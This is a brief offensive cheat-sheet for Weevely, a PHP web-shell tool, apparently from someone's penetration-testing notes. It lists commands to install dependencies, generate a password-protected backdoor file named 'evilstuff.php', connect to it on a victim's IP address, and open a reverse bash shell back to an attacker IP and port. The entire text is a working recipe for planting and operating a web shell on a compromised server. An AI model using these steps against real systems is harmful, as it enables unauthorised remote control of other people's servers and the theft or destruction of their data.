Weevely

# In case of python error
apt-get install python-pip libyaml-dev
pip install prettytable Mako pyaml dateutils –upgrade
pip install pysocks --upgrade

# Generate an agent
weevely generate evilHacker /root/malware/evilstuff.php
# evilHacker is a password

# Testing locally
weevely http://127.0.0.1/evilstuff.php

# Running Weevely
weevely http://< victim ip >/eveilstuff.php evilHacker

# Getting Help
weevely> :help

# Reverse Shell
:backdoor_reverse_tcp { attacker_ip} { port } -shell /bin/bash

Last updated